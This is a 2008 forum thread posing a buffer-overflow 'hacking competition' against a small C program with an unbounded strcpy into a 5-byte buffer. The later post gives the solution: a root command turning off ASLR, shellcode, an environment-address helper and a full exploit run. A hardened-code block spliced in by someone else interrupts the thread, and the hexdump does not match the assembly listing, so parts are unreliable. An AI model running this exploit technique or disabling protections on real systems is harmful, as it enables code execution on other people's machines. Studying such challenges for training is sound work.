#1
12-10-2008, 12:55 PM
Twitch
Second hacking competition

Ok, this time round we're going for something a little more advanced.
Using the same code as before (It'll be listed below), you must find a way of making the program print "<handle> was here". It can be done in any way, as long as you don't change the code.
I have done this myself, so I know what to expect from it! Anyway, for those who don't want to click back to the first competition, here's the code again:

Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void hidden(){
  printf("Well done!\n");
  exit(0);
}

int main(int argc, char *argv[]){
  char buffer[5];
  if(argc<2){
    printf("Usage: %s <your name>\n",argv[0]);
    exit(0);
  }
  strcpy(buffer, argv[1]);
  printf("Your name is: %s\n",buffer);
  return 0;
}
I expect that not as many people will get this.. I'll give hints this time: you'll need to learn a bit of assembly; buffer overflow; environment variables!
Notes:
I did both of these on a linux box.. Note, however, that Linux is not needed to pass these competitions! I just used it because the live cd that was used had debuggers, etc. For those of you who want this live cd (it's the hacking one - a load of useful tools, compilers, etc) check out the "Ask and ye shall receive" thread.. I posted a torrent there.
I'd say that perl is the only real 'tool' you'd need..

Best of luck folks. I'll post the answer in a week.
__________________
Twitch`

Last edited by Twitch; 19-10-2008 at 11:51 AM.
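For readers who want the defensive counterpart to the challenge, here is a hardened version of the same program (an added example, not Twitch's code): the 5-byte buffer is kept, but the unbounded strcpy is replaced by a hypothetical copy_name() helper that refuses any name that would not fit with its terminator, so argv[1] can no longer overwrite the saved return address on the stack.

```c
/* Hardened counterpart of the challenge program (added example, not the
 * original bug.c). Same 5-byte buffer, but the copy is bounded and over-long
 * input is rejected instead of spilling past the end of the buffer. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX 5   /* same buffer size as the original program */

/* Kept so the two programs stay comparable; nothing can reach it now. */
void hidden(void){
  printf("Well done!\n");
  exit(0);
}

/* Copy src into dst (capacity dstsz bytes) only if it fits including the NUL.
 * Returns 0 on success, -1 if src is too long; dst is left untouched on -1. */
int copy_name(char *dst, size_t dstsz, const char *src){
  /* Look for the terminator within the first dstsz bytes only, so a long
   * argument is never scanned or copied beyond what the buffer can hold. */
  const char *end = memchr(src, '\0', dstsz);
  if(end == NULL)                 /* no NUL inside dstsz bytes: does not fit */
    return -1;
  size_t len = (size_t)(end - src);
  memcpy(dst, src, len + 1);      /* len + 1 <= dstsz is guaranteed here */
  return 0;
}

int main(int argc, char *argv[]){
  char buffer[NAME_MAX];
  if(argc < 2){
    printf("Usage: %s <your name>\n", argv[0]);
    return 1;
  }
  if(copy_name(buffer, sizeof buffer, argv[1]) != 0){
    fprintf(stderr, "Name too long (max %zu bytes)\n", sizeof buffer - 1);
    return 1;
  }
  printf("Your name is: %s\n", buffer);
  return 0;
}
```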
#2
19-10-2008, 12:54 PM
Twitch
Re: Second hacking competition

Ok, here's something that may help most of you.. Since kernel 2.6.12, a countermeasure called ASLR is used to randomize the beginning of the stack. This means that we have no way of figuring out where our environment variables will be. It makes a lot of the processes involved with this sort of exploiting rather difficult, so here's how to disable it..

Code:
twitch@home:~ $ sudo su -
root@home:~ # echo 0 > /proc/sys/kernel/randomize_va_space
root@home:~ # exit
logout
twitch@home:~ $
With this protection off, the stack no longer begins in random locations. Leave the protection off when you are working on exploitation, challenges, etc, but don't forget to put it back on after you're done :P

UPDATE:
Ok, it's been a week since I posted this, and no one's messaged me their suggestions yet.. So here's the solution!

Code:
; This is the hello3.s program
; 32-bit Linux: write(1, msg, 15) followed by exit(0), with the string
; address recovered via the jmp/call/pop trick so no fixed address is needed

BITS 32
jmp short one          ; jump forward to the call

two: 
  pop ecx              ; ecx = address of the string (pushed by call two)
  xor eax,eax
  mov al,4             ; eax = 4, sys_write
  xor ebx,ebx
  inc ebx              ; ebx = 1, stdout
  xor edx,edx
  mov dl,15            ; edx = 15, length of the string incl. 0x0a 0x0d
  int 80h              ; write(1, msg, 15)

  mov al,1             ; eax = 1, sys_exit
  dec ebx              ; ebx = 0, exit status
  int 80h              ; exit(0)

one:
  call two             ; pushes the address of the string below, then jumps back
  db "Hello, world!",0x0a,0x0d
That is compiled with
$ nasm hello3.s


Code:
/* This is the getenvaddr.c program */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]){
  char *ptr;
  if(argc<3){
    printf("Usage: %s <environment variable> <target program>\n",argv[0]);
    exit(0);
  }
  ptr = getenv(argv[1]);
  if(ptr == NULL){
    printf("%s is not set in the environment\n",argv[1]);
    exit(1);
  }
  /* The environment sits at the top of the stack, just below the program
   * name, which appears twice there; a difference in name length between
   * this program and the target therefore shifts the variable by twice
   * that difference. */
  ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
  printf("%s is located at %p\n",argv[1],ptr);
  return 0;
}
That was compiled with
$ gcc getenvaddr.c -o getenvaddr


And here is how I did it:
Code:
user@home ~/dev $ nasm hello3.s
user@home ~/dev $ hexdump -C hello3 | grep --color=auto 00 
00000000  eb 11 59 b0 04 31 db 43  31 d2 b2 0f cd 80 b0 01  |..Y..1.C1.......|
00000010  4b cd 80 e8 ea ff ff ff  48 65 6c 6c 6f 2c 20 57  |K.......Hello, W|
00000020  6f 72 6c 64 21 0a 0d                              |orld!..|
00000027  
user@home ~/dev $ export SHELLCODE=`cat hello3`
user@home ~/dev $ ./getenvaddr SHELLCODE ./bug
SHELLCODE will be at 0xbffffbdf
user@home ~/dev $ ./bug `perl -e 'print "\xdf\xfb\xff\xbf"x8;'`
□□□□□□□□
Hello, World!
user@home ~/dev $
Just realised the POC I did here didn't have "blah was here", but you get the picture.
__________________
Twitch`

Last edited by Twitch; 19-10-2008 at 04:31 PM. Reason: Added solution.